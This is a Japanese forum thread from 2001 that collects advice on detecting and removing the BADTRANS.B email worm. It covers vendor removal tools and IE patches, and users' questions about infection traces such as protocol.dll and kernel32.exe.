猛威をふるう BADTRANS.B Re: メール (3通目)

このエントリーをはてなブックマークに追加
1ネット屋 ◆.t4dJfuU
この病気は、発病すると感染システムのIPアドレス情報と感染中に入力したユーザ名や
パスワードなどの個人情報が盗まれる恐れがあります。更に、この病気メール自身を知
り合いやあなたが見たことのあるホームページにあったメールアドレスなどにも撒き散
らしまくります。社会の迷惑です。すぐに駆除し、再感染防止策を取りましょう。

【病気のチェック】
http://security2.norton.com/ssc/lunavbrk.asp?scantype=2&langid=jp&venid=sym&plfid=20&pkj=DDSKYJDMVVOOAOMMUZY
http://housecall.antivirus.com/housecall/start_jp.asp
これらはチェックだけにして、感染していたら、

【病気の駆除】
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3368
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.badtrans.b%40mm.removal.tool.html
で駆除します。そして大事な、根本対策、再感染防止は、

【根本的対策】
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020
で、お使いのIEバージョンにあったSP2を当ててください。

詳細については >>2-9 参照のこと
2ネット屋 ◆.t4dJfuU :01/12/03 10:55
【有意義な過去LOG】
http://pc.2ch.net/test/read.cgi/sec/1006787500/
http://pc.2ch.net/test/read.cgi/sec/1007075829/

【病気の詳細情報】
http://inet.trendmicro.co.jp/virusinfo/isp/default3.asp?VName=WORM_BADTRANS.B
http://www.ipa.go.jp/security/topics/newvirus/badtrans-b.html
http://www.symantec.com/region/jp/sarcj/data/w/w32.badtrans.b%40mm.html
http://www.nai.com/japan/virusinfo/virB.asp?v=W32/Badtrans@MM
http://www.nai.com/japan/virusinfo/badtrans_zukai.asp
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000672.htm

【対策が必要なソフト】
プレビューしただけで感染する恐れがあるソフト:
Windows95/98/98SE/ME/NT4/2000でOutlookExpressを使用している方で、
・IE4を使っている人
・IE5、IE5.5で、SP2(サービスパック2)を当てていない場合
・IE6を、98,98SE,ME,NT4で最小インストールしたPC
バージョンは、ヘルプ→バージョン情報で確認できます。わからない人は下記を参照してください。
・IEのバージョン確認方法
http://www2.ocn.ne.jp/~circle/IE_version.htm
・OEのバージョン確認方法
http://www.neodevice.com/oe_ng/oe_ver.htm
※何故かIE3は大丈夫です。WindowsXPはIE6で最小インストールではないから大丈夫です。

【重要!!】
しかしWindowsXPを使っていたとしても、あるいは上記以外のメーラ---ベッキーとか
ポスペとか---を使用していたとしても、添付をダブルクリックすればもちろん感染します。
「対策を取る」=「プレビューしただけでは感染しなくなる」と言う意味ですよ!!
いかなる病気でも、添付ファイルをダブルクリックすりゃそりゃあーたもちろん感染します。
NECのPCでも同じです。ただしこの病気はMacには感染しません、絶対に大丈夫です。

>>3 へ続く
3ネット屋 ◆.t4dJfuU :01/12/03 10:55
【病気のチェック】
トレンドマイクロ社の
http://housecall.antivirus.com/housecall/start_jp.asp
では、感染しているにもかかわらず、検索できなかった例があるようです。
シマンテック社の
http://security2.norton.com/ssc/lunavbrk.asp?scantype=2&langid=jp&venid=sym&plfid=20&pkj=DDSKYJDMVVOOAOMMUZY
もやってみましょう。

【削除手順詳細】
トレンドマイクロ社から対策ツールが無償配布されています。作業は数秒で終わります。
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3368
これは、病気を除去するだけでなく、間違ってダブルクリックしても感染を防いでくれます。
http://inet.trendmicro.co.jp/solutionfile/3368Fix_BADT.EXE
↑駆除ツール直リン
「プログラムをディスクに保存する」にチェックを入れ、OK。保存する場所はどこでもいいけど、
ディスクトップが楽。ディスクトップにして保存を押す。「3368Fix_BADT.EXE」がデスクトップ
に出来るので、これをダブルクリック。じたばたしたら、スペースキーを押して完了。デスクト
ップに出来た、
3368Fix.BADT.EXE / FIX_BADT.BAT / fix_badt.com / FIX_BADT.LOG / readme(J).txt
は、消してしまってOKですが、「FIX_BADT.LOG」だけは何をやったかのログなのでしばらく取っ
て置いた方がいいかも。その後、念のため再起動で完了です。

シマンテック社からも対策ツールが無償配布されています。
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.badtrans.b%40mm.removal.tool.html
こちらは全ハードディスクを検索しますので、少々時間がかかります。

山田洋行からもDOSでの渋い無料ソフトが出ています。本体と定義ファイルが配布されています。
http://www.fs-support.yamada.co.jp/df/v-descs/v-descs2/bt_b_dis.htm

>>4 に続く
4ネット屋 ◆.t4dJfuU :01/12/03 10:56
【プレビューだけで感染してしまう根本原因】
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020

【プレビューだけで感染してしまうことに対する抜本的対策】
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020
で、お使いのIEバージョンにあったSP2を当ててください。
IE6を標準でインストールしてしまうと言う方法もあります。

【よくわからない場合】
http://windowsupdate.microsoft.com/
で、「製品の更新」、をクリックし、「重要な更新」と「推奨する更新 」をやってみてください。

【対策後の確認】
インターネットエクスプローラのバージョン確認は、「ビルド番号」で確認すべし。
5.00.3314.2101 Internet Explorer 5.01 SP2 (Windows 95/98 and Windows NT 4.0)
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6 (Windows XP)
のいずれかならばOK。
http://support.microsoft.com/directory/article.asp?ID=KB;EN-US;Q164539

【感染していた人は】
念の為、感染していたと思われる期間に手入力したパスワードを変更されることが推奨されています。
http://www.npa.go.jp/hightech/notice/badtrans.htm

>>5 に続く
5ネット屋 ◆.t4dJfuU :01/12/03 10:56
【用語解説】
・プレビュー
プレビューウィンドウとは、3 ペインの窓の右下にあたる部分です。OE(OutlookExpress)の、
表示→レイアウト→プレビューウィンドウを表示するのチェックをつけたり消したりすると、
出たり消えたりする部分のことです。最近は保安のため使用しない人が増えています。

・セーフモード
PCを再起動します。そして、Windowsは立ち上がる途中の白黒画面の下の方に問題解決のために
はF8を押せ みたいな表示がでます。出てきているのなら「すかさず」F8を押します。時間が短
いので、「すかさず」です。選択画面が現れてその中にセーフモードというようなものがあるは
ずなのでそれを選択すればOKです。

・SP(サービスパックの略)
製品出荷後に発覚したいくつかの障害対策をまとめたもの。SP2はサービスパックの2番目の意。

Q.病気に感染しているかどうか心配で心配で。
A.「オンラインウィルス検索」
http://security2.norton.com/ssc/lunavbrk.asp?scantype=2&langid=jp&venid=sym&plfid=20&pkj=DDSKYJDMVVOOAOMMUZY

http://housecall.antivirus.com/housecall/start_jp.asp
で、チェックしましょう。今のところ両方やってみることをお勧めします。

Q.「オンラインウィルス検索」で検索して、ウィルスは見つかりませんでしたと言われましたが、
まだ、病気に感染しているかどうか心配で心配で。
A.お店に行って、ウィスル関係のソフトを買ってきてみましょう。感染しているにも関わらず
「オンラインウィルス検索」で発見できなくても誰にも文句が言えませんから。
最近は多機能で便利なので、購入をお勧めします。

>>6 に続く
6ネット屋 ◆.t4dJfuU :01/12/03 10:56
Q.ウィルス専門のソフトを使用し、検索しても見つかりませんでした。それでも心配で心配で。
A.最新の定義ファイルを拾って検索しましょう。詳細は他のスレッドを参照してください。
それをやっても心配な場合は、今のPCはすっぱり捨てて、WindowsXPプレインストールマシンに
買い換えましょう。それでも添付を再度ダブルクリックすれば感染することがありえますが。

Q.友達から、「病気送るなゴルァ」ってメールが一杯来ました。どうしましょう。
A.「オンラインウィルス検索」で検索です。見つからなかった場合、その友達に、本当に病気が
「BADTRANS.B」であったかどうか確認して下さい。「BADTRANS.B」であったなら、やはりあなた
のPCが感染している可能性が高いです。
ただし、病気が「NIMDA」の場合、別人になりすましてメールを送ることがありますので、
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
の中央辺り、「大量メール送信」のところの、
--------------------------------------------------------------------------------------
ワームが送信するメールは、感染しているコンピュータのユーザからではなく、感染したコンピ
ュータ上でNimdaが発見したメールアドレスのユーザから送信されたものに見えます。
--------------------------------------------------------------------------------------
の部分を教えてあげてください。

Q.「オンラインウィルス検索」に逝っても何も起こりませんが、何か?
A.シマンテック、トレンドマイクロ、どちらもJavaScriptとActiveXコントロールが動く必要があります。
http://security2.norton.com/ssc/lunavbrk.asp?scantype=2&langid=jp&venid=sym&plfid=20&pkj=DDSKYJDMVVOOAOMMUZY
の場合、1〜2回OKを押せば自動的に開始します。
http://housecall.antivirus.com/housecall/start_jp.asp
の場合も、1〜2回OKを押し、しばらく待つと、下の方に自分のPCに接続されている記憶装置一
覧の絵が出てくるはずです。絵が「×」マークのときは、JavaScriptかActiveXが動かないような
設定になっている可能性があります。絵が出ているときは、ハードディスクの前の□に全部チェッ
クを入れて検索開始します。チェックは長くても2時間程度でしょうか?
また、今はとても混雑しています。再読み込みすると動き出すことがあります。

>>7 に続く
7ネット屋 ◆.t4dJfuU :01/12/03 10:57
Q.「オンラインウィルス検索」で検索したら、感染したファイルが見つかりましたと言われまし
たが、削除できないって!おろおろ!
A.「オンラインウィルス検索」は、感染の有無を調べるだけの目的に使用し、削除は
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.badtrans.b%40mm.removal.tool.html

http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3368
に任せるのが得策でしょう。

Q.バスターやノートン先生で『駆除失敗』と出たんですけど感染したのでしょうか?
A.感染活動を行わない不正プログラムですのでウイルスバスターなどウイルス対策製品の機能で
「駆除」処理は行えません。慌てず検出したファイルはすべて「削除」処理を行ってください。
あるいは、
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.badtrans.b%40mm.removal.tool.html

http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3368
に任せてください。

Q.「_RESTORE」フォルダのTEMPフォルダ内のA000〜.CPYのいくつかにウイルスが感染してると言
われたが、使用中で削除できない。助けて。
A.MEでは有名な現象のようです。下記のURLを参照してください。
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=2186
http://www.zdnet.co.jp/help/tips/windows/w0345.html

>>8 に続く
8ネット屋 ◆.t4dJfuU :01/12/03 10:57
Q.プレビューウィンドウを消すには?
A.OEの上のメニューの中の、 表示→レイアウト→プレビューウィンドウを表示するのチェックを
外してOKを押します。

Q.Windowsにサービスパックを当てればいいんすよね?
A.それだけではダメです。IE5/5.5にサービスパック2を当てないといけません。

Q.OutlookExpressのサービスパックを当てるんとちゃうんかい?おらIE使ってねーずら。
A.OutlookExpressがIEの中に含まれる機能を使用しています。よってIEのSP2を当てないとダメです。

Q.Windows Updateに逝って、製品の更新→Internet Explorer 5.5 Service Pack 2 とインターネ
ット ツールを選択してアップグレードしようとしても失敗するYO!
A.病気以前の問題で、ハードディスクかOSがやばいかも?何回かやってダメだった場合は下記参照
http://www.microsoft.com/japan/support/kb/articles/J048/9/02.asp

Q.削除しようとしてダウンロードの確認ダイアログが出て、それをキャンセルすると、プログラム
の強制終了でOEが閉じてしまいます。
A.WindowsかOEがやばいかも。とりあえずプレビューをOFFにして乗り切りましょう。
正常なメールすら見られなくなってしまった場合、
http://windowsupdate.microsoft.com/
で、「製品の更新」の「重要な更新」や「推奨する更新 」をして見てください。

Q.感染していました。駆除はしましたが、誰に迷惑をかけたかわかりますか?
A.protocol.dll と言うファイルがどこかに残っていますか?これが恐らくあなたのPCが病気メール
を送信した人の一覧ですが、暗号化されています。行数から概ねの人数はわかると思います。
ちなみに、この「protocol.dll」ファイルは病気が作ったものなので、消してしまってOKです。

>>9 に続く
9ネット屋 ◆.t4dJfuU :01/12/03 10:57
Q.ウィルスに感染して、駆除したんだけど、それ以来メールの受信がエラーになって受信できません。
A.IEのバージョンを上げたりSP2を当てたりしたときでしょうか?まだよく判っていませんがこのよう
な症状が何件か報告されています。受信サーバの設定、POP3のポートがプロバイダの指示通り(普通
は110)になっているかどうか、また、アカウントやパスワードを再設定することで直るようです。
下記が参考になるかも。
http://outlook-express.virtualave.net/faq.html
IE5の場合
http://www.microsoft.com/japan/support/kb/articles/J048/2/89.asp
も参考にしてください。

Q.Hotmailは安心ですか?WEBで見たときと、OEで見たときと違いますか?
A.大丈夫なようです。
-----------------------------------------------
メッセージはダウンロードされていません
このメッセージはまだダウンロードされていません。
-----------------------------------------------
と出て、ちゃんとプロテクトされているようです。ただ、スペースキーを押して強制的にDLし、
実行すれば感染するかも知れません。
10 :01/12/03 11:04
乙〜!
11名無しさん@お腹いっぱい。:01/12/03 11:04
ネット屋さん、お疲れさまでした。(^-^)
12とろとろ ◆TORO/cjY :01/12/03 11:11
ネット屋さん、すばらしい。
13名無しさん@お腹いっぱい。:01/12/03 11:53
お疲れ様です〜。

今日も来るんだろうなぁ。
会社のパソコン大丈夫だろうか。
>>13
対策してないの?
>>13
Nimdaで対策されてる企業は大丈夫でしょう。
16Oxy:01/12/03 12:34
ネット屋さん、ご苦労様です。

知り合いに、質問されたらココを見ろと言っておきます。
そんな訳で、このリンク貼らせてください。

メールをDLする前に、サーバー上で削除
 ttp://www.nakka.com/soft/npop/
スレ立てご苦労様です。
(まとめ、お見事です)

今日は来ない・・・おちついたのかな?
18 :01/12/03 13:03
わーい!久しぶりに2通目来た!!即効削除で御陀仏
19名無しさん@お腹いっぱい。:01/12/03 13:25
BADTRANS.Bに感染したPCがウィルスメールを送信するのは一回のみなのでしょうか?
それから、ダダ漏れたパスワードの類は誰が握るのでしょうか?ウィルス撒いた人?
沢山きて使うの大変ではないですか?……という素朴なギモンです。

もう何回が来ているのと同じReメールが来て、容量も40kだったのでこりゃ間違いないと、
その送信者は知り合いなので電話して知らせ、すぐにウィルスチェックして対応するように
言ったのですが、どうもその時のむこうの対応が危機感ゼロでこちらが迷惑な言いがかりを
つけたみたいな雰囲気でした(苦笑)
どうもこのまま放置くさいのですが、その場合の放置ユーザーにパスワード漏洩以外の
不利益があるのでしょうか?
あるのなら、もうひと脅しして対策を迫りたいのですが……。
20名無しさん@お腹いっぱい。:01/12/03 13:35
>>19
そんな相手なら付き合いやめればいいじゃん。
メールも受け取り拒否設定ね。
21名無しさん@お腹いっぱい。:01/12/03 13:38
最近身に覚えのない送信者から添付ファイル付きのメールが
送られてくるのですがこれはヤバイのでしょうか?

送信者:artig
件 名:Re:
22名無しさん@お腹いっぱい。:01/12/03 13:42
>>16
>メールをDLする前に、サーバー上で削除

nifだったら、インターウェイから入れば、
メール本文ダウソしなくても、送信者と題名を確認してあぼーんできるよ。
送信者:_****,題名:Re:←こんなわかりやすいやつなら楽勝。
23名無しさん@お腹いっぱい。:01/12/03 13:42
あのー、メールの受け取り拒否設定ってどうやれば
いいんですか?
拒否した場合、相手にその旨通知とかいくんですか?
>>19
パスワード漏洩以外の不利益って、、、、
↓以下その知人向け。
クレジットやダイアルアップのパス、、
キーログ取って送るんだぞ。。
例えば、エロサイト/オンラインカジノから法外な請求書来るかもしれない。
米国国家安全保障局のサイトに不正アクセスの疑い掛けられるかもしれない。

作者が善感染者のキーログファイル確実に受信してるかどうかは相手に言わないこと(w
すんごい大容量サーバ準備してごっそり頂いてるらしいよ。ぐらいは言っとく。

一番単純なのは、常連になってるエロサイトの管理人にメアド捕捉されて、そのうちスパムの
嵐が来るかも痴れません(w
25ネット屋 ◆.t4dJfuU :01/12/03 13:51
>>19
「同じ人から何回も来た」と言う報告があります。protocol.dllで再送防止を
しているはずなのですが、ひょっとするとパッチが当たっていないIEでプレビューを
する度に、送るのかも知れません。そのあたりの解析情報は見つかりませんでした。
パスワードのハック結果はフリーのメールアドレスに送られるようです。
大量なので、既にパンクしているでしょうし、作者の特定をされてしまう可能性も
あるので、本当にパスワードの取得が目的で作成されたものかどうかは不明です。
他人に病気のメールを送りつづけることと、特定のタイミングでのシャットダウンと
言うのがあるとかかれていました。
>>21
そのメールをプレビューしたことがありますか?あった場合、どうなりましたか?
>>23
ツール→メッセージルール→禁止された送信者の一覧です。
相手に通知は行かないと思います。
>>25
21です。
不審メールが以前にこのスレッドを読んでいたので
プレビューを開かない状態に設定しています。
ですので開くとどうなるかは不明です。

ちなみにこのメールを含めて1週間に不審メールが3通目
来ましたが全て中身を確認せずに削除しました。
27名無しさん@お腹いっぱい。:01/12/03 13:56
>拒否した場合、相手にその旨通知とかいくんですか?
相手にわからせる為には通知いったほうがいいね。
28名無しさん@お腹いっぱい。:01/12/03 13:58
>>26
パッチやってないの?
2919:01/12/03 13:59
>24
アドバイスありがとうございます♪
>↓以下その知人向け。
の以下部分を口頭で引用させてもらいますね。
自分もギモンだったので、メールは送ってしまったモンだし、別にヤバイサイト
に出入りもしてないし、オークションも参加してない……って言われると、
どう切り返したものかわからなかったのでした。
容量食われるタイプならまた違ったんだろうけど。
でも、フツー、ウイルス感染したメールを自分が発信してたって聞けば、
私なら血の気と友人たちのひく足音を脳内で聞く気がするけどなぁ…(鬱
30ネット屋 ◆.t4dJfuU :01/12/03 14:00
>>26
全て見ていなければ感染していないと思います。暇だったら、オンライン検索
してみてもバチは当たらないと思います。
>>28
一応IE6.0を標準インストールしています。
ただ、アンチウイルスソフトは導入していませんので
何分不安でして...
>>19
電子メールはちょっと知識のある人がその気になれば誰でも読めると思った
ほうが良いです。暗号解読できる人もいっぱいいるでしょう。
今回のパスワードメールも裏の名簿屋やにわかクラッカー、パスワードコレク
ターの美味しいご馳走になっているかもしれませんね。
(腹がパンクしているかもしれませんが・・)
ためしにgoogleとかで電子メールの危険性とかのキーワードで検索してみる
といいかもです。
33名無しさん@お腹いっぱい。:01/12/03 14:14
このウイルスって、フリーメールでも感染するんでしょうか。
exciteメールでおかしなメールを開いてしまいました。
添付ファイルはなかったのですが、本文が何もないのに
妙に容量があったので気になっています…
怖くてすぐに削除しましたが、タイトルに「Re:Re…」とあった気がして
怖いです。
どなたかご存じの方、教えていただけないでしょうか…
感染するかどうか聞く前に1のウイルスチェックをしたほうがいいですよ。
他のウイルスにかかっている可能性だってあるんだし。次に聞く前に
1から9までを読んで正しい知識を身につけておきましょう。
3524:01/12/03 14:19
Protocol.dllかぁ〜〜
>>25
つまり、感染!?送信した??な人はコレの存在確認すれば良いんでないの。
回線切って自爆後、即駆除作業した時はコレ無かった。
容量大きければ、、、目安にはなるのか。。1箇所送信記録時の容量解らない
けど(w

>>29
まぁ、あくまで否定できない?可能性として言ってやった方が良いと思う。
NSAにアタックなんて殆ど映画の世界(w
でも、不特定多数にメアド流出は否定できない事実。

例えば作者グループ??特定企業の使用者のデータだけ抜きたくて流した
可能性も有る。目的達成すれば後はどうでも良いんでしょ。きっと。
>>33
心配ならオンラインスキャンをかけて見れ
3733:01/12/03 14:20
>34
書き忘れましたが、1のウイルスチェックは既に初めて、
今チェックの途中です。
38名無しさん@お腹いっぱい。:01/12/03 14:23
オンラインスキャンする前に削除ツールやっちゃったんですけど
本当に自分が感染してたかどうかを知る方法ってありますか?
39ネット屋 ◆.t4dJfuU :01/12/03 14:26
>>38
削除ツールのLOGは残っていませんか?
protocol.dll を検索してみてください。
40名無しさん@お腹いっぱい。:01/12/03 14:32
>39
ご回答ありがとうございます。

LOGは、このスレを読む前だったもので、
勝手な独断で消してしまったんです・・・
他には確かめる方法はないでしょうか・・・
お忙しいところほんとにすみません!
41名無しさん@お腹いっぱい。:01/12/03 14:38
>40
諦めろ
>>40
>>39は質問事項が二つ書いてありますよ?
43名無しさん@お腹いっぱい。:01/12/03 14:43
すみませんが教えてください>>1の【病気のチェック】のチェックはしました。
結果は、感染してませんでした。
それで、IE5.5のSP2をあてました。
これで当該ウィルスの対策は、できているのでしょうか?

OSは、ME・アンチウィルス・ZAいれてます。
すみませんがお願いします。
4440:01/12/03 14:44
>41
がーん・・・

>42
LOGもprotocol.dllっていうのも見つからないんです・・・

何で消しちゃったんだろう・・・
ああもう、私の馬鹿。
>>43
>>4は読みましたか?
46名無しさん@お腹いっぱい。:01/12/03 14:49
>>45
読みました。
と、いう事は出来てるという事なのでしょうか?
心配だったものなので・・・申し訳ございません。
47自爆君:01/12/03 14:49
>>40
cp_25389.nlsもシステムに残ってないか検索して見れ。
メール送信して無くてもこれは存在する。
w2kだとC:\WINNT\system32に有った。9XだとC:\Windows\Systemかな。
単なる?キーログファイルだからか、ウイルスバスターだと検出しない。
ちなみに、漏れは344バイトだった。
何記録してあるのか何とか割れないかな〜〜そんなに複雑なもんじゃ無
いはずだと思うけど。。
48名無しさん@お腹いっぱい。:01/12/03 14:49
>>2に書いてあることを確認させていただきたいのですが、
ポストペットなら、添付ファイルをクリックしない限り
プレビューしただけでは感染しないんですよね?
>>47
それ、トレンド駆除ツールの削除対象。Protocol.dllは削除されない。
50名無しさん@お腹いっぱい。:01/12/03 14:52
>47
わざわざありがとうございます。
こんなくだらない初心者な質問ですみませんでした。

検索してみたところ、cp_25389.nlsも見つかりませんでした。
元々感染してなかったんでしょうか・・・?
5147:01/12/03 14:53
>>40
訂正。トレンドマイクロの駆除ツールはcp_25389.nlsも削除対象だね。。。
>>47
は無視してケレ。スマヌ。
52名無しさん@お腹いっぱい。:01/12/03 14:54
>49
ええと・・・つまり、
Protocol.dllが無ければ、元々ウイルスには
感染してなかったと見ていいんでしょうか?
違ったらスミマセン。
5347:01/12/03 15:00
>>49
速レスアリガト。。待てよと思いサイト確認、追いつかなかった(w
でも、バスターの方では検出しない。パターンファイルに含む事でき
ないのね。
ツールはファイル名指定して削除してるんだね。
そりゃそうだキーログファイル放っておくのは不味い。
54ネット屋 ◆.t4dJfuU :01/12/03 15:10
>>52
少なくとも病気は送ってないと思われます。
55名無しさん@お腹いっぱい。:01/12/03 15:14
>54
そうですか!良かったぁ・・・
どうもありがとうございました!
本当に助かりました!!
56ななし:01/12/03 15:17
知らないあいてからメールが来てて添付ファイルが
EPWRUN01.exeだったんだけどこれなにかわかります?
>>56
名前だけ見ればエプソンのプリンタドライバの構成ファイルのようだけど
知らない人からの怪しいメールは迷わず削除しませう。
59????:01/12/03 15:30
めちゃ、恥ずかしい(藁
とりあえず逝きます 57さんサンクス!
エプソンのプリンター用ドライバーのような違うような。
きっと違うんだろうなぁ。
Magisterぢゃ無ければ良いけど。。。
知らない相手?なら外れる。
62おいおい:01/12/03 15:37
市役所から届いたぞ〜。
即感染してますヨ!とメール出したけど(^^;;
あっ、e要らなかった。。
Magistr
64名無しさん@お腹いっぱい。:01/12/03 16:42
>56
誤爆かもしれないけど、怪しいのはさっさと削除するのが精神衛生上よろしいかと
好奇心をそそられるのはわかるけどね
65ネット屋 ◆.t4dJfuU :01/12/03 16:51
>>56
・インターネットから切断する。
・そのファイルを名前を付けて保存する
・保存したディレクトリに対し、徹底的にウィルスチェックをかける
・PCをクリーンインストールしなおす。
かなり危険です。お勧めしません。
ファイル名を既存のモノにしてるだけかも知れないし
本当にドライバかどうか分からないからな・・・
67■マルチは禁止■:01/12/03 17:28
PC初心者板とマルチしてる奴はレス無いと思ってね。

回答者を信頼してないとみなされます。
68九州男 ◆8U2HuhRg :01/12/03 17:57
うん。。。
あっちにもこっちにもこれって君が出現してるね。
69名無しさん@お腹いっぱい。:01/12/03 18:23
まだ今日も届いてます。
いままでに全部で59通、通数の多いトップ5は
dion…8、nifty…6、ocn…5、biglobe…4、infoweb…4
です。

昨日はじめてocnのTVCF見ました。うそつき〜。
70名無しさん@お腹いっぱい。:01/12/03 18:28
おれも3通目だじょ。腹立つ。
メール件名:Re:
添付ファイル:Humor.mp3.src
本文:無し

というメールが届きましたこれが表題のRe:
メールというものなのでしょうか?
>>71
アンチウィルスソフトは反応しなかったの?
7371:01/12/03 18:57
ごめんなさい、BADTRANS.Bについての知識が無いままメールを受信し
直感的にウィルスメールである事を理解し、かちゅーしゃでこの板に飛んできて矢も盾もたまらず
気が動転したままに書きこみしてしまいました

二重拡張子&タイトル無しなので間違いないと思いますが
今>1を頼りに発見>駆除にとりかかっております

ありがとうございました
74名無しさん:01/12/03 19:39
kernel32.exeというファイルは消したんですが、
Kernel32.o20というファイルがウィンドウズのシステムフォルダの中に
残っていたのですが平気でしょうか?
ちなみにそのファイルの更新日は1996年になってます。
75.:01/12/03 19:43
C:\WINDOWS\SYSTEM\kernel32.exeフォルダ
てのがあります。
中身はから。

これは何ですか?
76sage:01/12/03 19:59
>>75
ネタか?
それウイルスだぞ
77九州男 ◆8U2HuhRg :01/12/03 20:01
>76
駆除ソフト実行後と思われ・・・
78名無しさん@お腹いっぱい。:01/12/03 20:16
>>75
トレンドマイクロの駆除ソフト
FIX_MagB ver 1.00
Read Meファイルより。

・機能:
 このツールは以下の要領で感染したマシンからワームの削除を行っています。
1.「WORM_BADTRANS.B」活動を停止します。
2. システムの修復
 「WORM_BADTRANS.B」に変更されたレジストリを修復を行います。
3.感染ファイルの駆除または削除
 ウイルスに作成されたファイルを「WORM_BADTRANS.B」で検知し、削除します。
4.c:\KERNEL32.EXEというフォルダーを作成し、免疫力をつけます。
79名無しさん@お腹いっぱい。:01/12/03 20:35
バッチ 及び IE6は
実行可能なファイル(今回は pif scr)を自動実行させない
という対処をしている。
で いいんですね?
「ウイルス付きのメールは自動的に関知して・・・」と言っている人が居ますがまちがいですね?
80名無しさん@お腹いっぱい。:01/12/03 20:43
18禁サイトやってるのに11歳の子供からBADTRANS.B付のメールが来た…。
81名無しさん@お腹いっぱい。:01/12/03 20:43
いまだに一通も来ない・・・
友達は少ないけどヤフオクで500件以上取引したから
少しは来ると思ってたのになあ。
82名無しさん@お腹いっぱい。:01/12/03 21:08
>81
サイト抱えてるとやっぱりどかどか来る。
ここ数日で1日平均数十通ぐらい。
一番多い日で122通。数える俺も暇だが。
>>81
相手が未読のメールを持ってないと送ってこないのでは。
84名無しさん@お腹いっぱい。:01/12/03 21:18
>83
ん?
たとえばおれが感染していたとして
おれが見た サイトに書かれているアドレス
なんかにも 送るんじゃなかった?
85名無しさん@お腹いっぱい。:01/12/03 21:20
>>84
ヤフオクの相手のことと限定して話してるんだと思われ
86名無しさん@お腹いっぱい。:01/12/03 21:25
>85
おお 失礼しました >83、85

79の答えも できたらいただきたいです。
とあるMLに流れてきた文章ですが、OE6がウイルスをチェックするという誤解が生じてもあれなんで・・・
87名無しさん@お腹いっぱい。:01/12/03 21:28
>>86
>>4の先頭にあるURLに今回のセキュリティーホールの説明があるよ。
(不適切な MIME ヘッダーが原因で Internet Explorer が電子
メールの添付ファイルを実行する)

OE6は、その穴が埋められているだけ。
>>86
OE6には、実行可能ファイルは開けないようにする仕組みがあります。
しかし、それはEXEなどが実行できなくなるだけで、
ウイルス駆除機能はありません。

あくまで補助と考えてください。
89名無しさん@お腹いっぱい。:01/12/03 21:42
>87,88
了解
その旨伝えます。 すっとしました。
いまいち 自分の考えに自信がもてなくて<小心者
ありがとうございました。
90by:01/12/03 22:00
>>76
間違っているのはあーた。
91名無しさん@お腹いっぱい。:01/12/03 22:10
BADTRANS.Bかどうかは未確認ですが、在京FM局J-WAVEの
某番組宛てにも送られ不用意に開封、多数のリスナーへ
撒き散らした模様です。放送内では「添付ファイルをクリック
しなければ感染しない、古いタイプのウィルス」としか説明
されませんでした。もしBADTRANS.Bの場合、>>2のように
パッチを当てていないとプレビューでも感染すると思います
が、そのような説明はありませんでした。
92名無しさん@お腹いっぱい。:01/12/03 22:12
先日Reメールが送られてきました。
バージョンアップはしていたので、ファイルは開かないでそのまま削除。
今日になってOutlookの調子が悪いみたい。送信やメールを削除しようと
してもディスクの容量が足りませんと警告が出てくる。これって感染して
いるのでしょうか?
ちなみに私のフォルダにもKernel32.o20とKerne32.dllが有ります。

一応、過去ログ読んでスキャンしましたが、ウィルスは発見されません
でした。何が原因なんでしょうか?
93名無しさん@お腹いっぱい。:01/12/03 22:13
>>92
kernel32.dllはWindowsが使うファイルです。

あっちゃ駄目なのは
kernel32.exe
94.:01/12/03 22:19
>>93
フォルダなら大丈夫。
>78 みて。
95名無しさん@お腹いっぱい。:01/12/03 22:21
>>93有り難うございます。

でも、受信は出来るのに送信が出来なくなったのは
何が原因なんでしょうか?インストし直した方がいいの
でしょうか?ぼちぼちやってみますね。
96名無しさん@お腹いっぱい。:01/12/03 22:27
97九州男 ◆8U2HuhRg :01/12/03 22:29
>95
ニフティあたりでフィルタ通す契約でもしたんじゃない?
98名無しさん@お腹いっぱい。:01/12/03 22:46
今日またうちのノートン先生がBadtrans.Bに反応した。
ウイルスメールのタイトルを見てみると
「Re: Re: (以下文字化け)」ってRe:が2重になってた。
こういうケースもあるのですか?
99名無しさん@お腹いっぱい。:01/12/03 22:48
>>98
多分送信元の受信フォルダに「Re:(件名)」ってタイトルの
未開封メールがあったのでしょう。
100名無しさん@お腹いっぱい。:01/12/03 22:51
Protocol.dllの内容ですが、
BASE64でデコードしたら
メアドになりました。
鬱になった私は元感染者・・・
101名無しさん@お腹いっぱい。:01/12/03 22:54
>>100
そういうことだったのか!
でかした!
102九州男 ◆8U2HuhRg :01/12/03 22:55
厨房な質問ですまん。
BASE64ソフト?
なんに使うやつ?
103名無しさん@お腹いっぱい。:01/12/03 22:57
MSのセキュリティ意識の甘さはどうにかならないものかとつくづく思う。
ユーザにわからないようにネットに接続するんだから・・・

自動アップデート、LOADQM.EXEなどなど・・・

一番の対策は不用意にネットに接続しないことだと思うけど・・・
もうイヤになってきたよ。ネットの環境だけはMACにしようかな。
みんなはどう思う?
104名無しさん@お腹いっぱい。:01/12/03 22:58
難しいことは良くわからんけど
Mbakerとかいう文字化けを治す
フリー?ソフトがあります。
105名無しさん@お腹いっぱい。:01/12/03 22:58
106名無しさん@お腹いっぱい。:01/12/03 23:00
結果的にウイルスソフトの会社が儲かるのね
107九州男 ◆8U2HuhRg :01/12/03 23:07
>105サンクス!

>106
昔日本が平和だったころは玄関に鍵なんか
かけなくても良かった。
でも今は。。。
結構な田舎でも玄関に鍵掛けない家なんか
無い。

そういうこと。
108名無しさん@お腹いっぱい。:01/12/03 23:09
Mbaker2 フリーソフトでした
ttp://www.geocities.co.jp/SiliconValley/1469/index.html
